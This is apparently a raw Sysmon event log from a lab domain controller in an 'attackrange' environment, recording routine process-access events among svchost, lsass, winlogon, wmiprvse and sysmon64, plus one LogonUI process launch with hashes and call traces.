10341000x80000000000000009425Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.373{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009424Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.373{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009423Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.373{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009422Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.373{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009421Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.373{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009420Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.373{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009419Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.373{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009418Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.373{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009417Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.373{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009416Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.373{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009415Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.357{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009414Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.357{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009413Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.357{08A6967A-4750-6000-0205-000000009A01}47883304C:\Windows\system32\csrss.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009412Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.357{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009411Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.357{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009410Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.357{08A6967A-4750-6000-0305-000000009A01}50724156C:\Windows\system32\winlogon.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+193b7|C:\Windows\system32\winlogon.exe+22617|C:\Windows\system32\winlogon.exe+2b287|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009409Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.357{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009408Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.372{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\System32\LogonUI.exe10.0.14393.0 (rs1_release.160715-1616)Windows Logon User Interface HostMicrosoft® Windows® Operating SystemMicrosoft Corporationlogonui.exe"LogonUI.exe" /flags:0x2 /state0:0xa3a68855 /state1:0x41c64e6dC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e72SystemMD5=B38DFCF985D8AE5B1A17C264981E61C7,SHA256=AA62D29803D52EC06CD27ED3124E034048F09606EB7342181913C9817C7B44C5,IMPHASH=A6F3A84D171E55B51A7343E05C8DFAC3{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\System32\winlogon.exewinlogon.exe 10341000x80000000000000009407Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.357{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009406Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.357{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009405Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.357{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009404Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.357{08A6967A-4288-6000-1000-000000009A01}11362164C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009403Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.357{08A6967A-4288-6000-1000-000000009A01}11362164C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+3c53|c:\windows\system32\themeservice.dll+2675|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009402Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.357{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009401Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.357{08A6967A-4288-6000-1000-000000009A01}11362164C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009400Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.357{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009399Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.357{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009398Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.357{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|